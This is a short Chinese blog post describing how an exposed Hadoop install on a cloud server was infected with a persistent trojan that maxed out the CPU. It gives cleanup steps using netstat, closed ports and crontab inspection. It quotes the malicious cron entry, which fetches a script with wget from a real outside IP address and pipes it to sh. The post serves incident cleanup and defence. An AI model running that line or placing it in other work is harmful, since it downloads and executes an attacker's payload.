学习hadoop遇到的问题(记一次阿里云服务器被恶意挂木马,CPU100%)

在我刚开始学习时,把防火墙,安全组都开放了,过了一段时间被挂上了木马。并且杀死进程一会还启动

解决办法

1通过命令netstat -antlp|grep 9002查看端口文件地址,删除可以文件(java文件夹)

2.还得在安全组中关闭hadoop一些对外开放的web页面(可以改变端口号)

3.在/etc/crontab、/var/spool/cron/、/var/spool/cron/crontabs/下查看可以文件,查看文件里的命令,

例如:

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1

这些就是可疑的命令,把他删除

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值